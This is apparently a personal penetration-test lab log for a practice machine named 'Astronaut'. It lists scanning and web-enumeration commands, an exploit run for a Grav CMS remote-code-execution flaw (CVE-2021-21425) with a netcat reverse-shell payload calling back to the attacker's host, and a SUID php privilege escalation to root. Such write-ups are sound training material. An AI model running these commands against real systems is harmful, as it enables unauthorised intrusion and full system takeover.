Astronaut
๐งช Pentest Log: {{date:2025-08-11}}
๐ Target Information
- Machine Name: Astronaut
- IP Address: 192.168.187.12
- Operating System: Linux
ip=192.168.187.12
๐ก Enumeration
๐ Port Scanning
Command Used
ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt
nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt
Port 22
Port 80
Web Directory Scan
gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt
feroxbuster --url http://$ip
wpscan --url http://$ip
dirsearch -u http://$ip -r -o dirsearch.txt
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://$ip$/ -H "Host: FUZZ.website.com"
nikto -h http://$ip
curl -s http://$ip/ | html2markdown
Google "grav cms unauthenticated exploit', found
CVE-2021-21425
๐ฃ Exploitation
๐ Vulnerability Summary
- Service / Port: 80
- Vulnerability Type: RCE
๐ Exploit Execution
๐ง Exploit Method
Tool / Script Used:
https://github.com/CsEnox/CVE-2021-21425
python3 exploit.py -c "busybox nc 192.168.45.163 80 -e /bin/bash" -t http://192.168.187.12/grav-admin
python3 /home/kali/Documents/oscp/penelope/penelope.py -p 80
๐งฌ Privilege Escalation
๐ค Current Access
- User: www-data
- Groups: www-data
- Shell Type: reverse shell
๐ Enumeration
SUID:
find / -type f -perm -4000 2>/dev/null
found
/usr/bin/php7.4
๐ Privilege Escalation Exploit
๐ Exploit Summary
- Technique Used: SUID Abuse
- Target Binary/Service: php7.4
- Reference / Source: GTFOBins
๐ง Exploit Steps
- Smash to root
CMD="/bin/sh"
./php -r "pcntl_exec('/bin/sh', ['-p']);"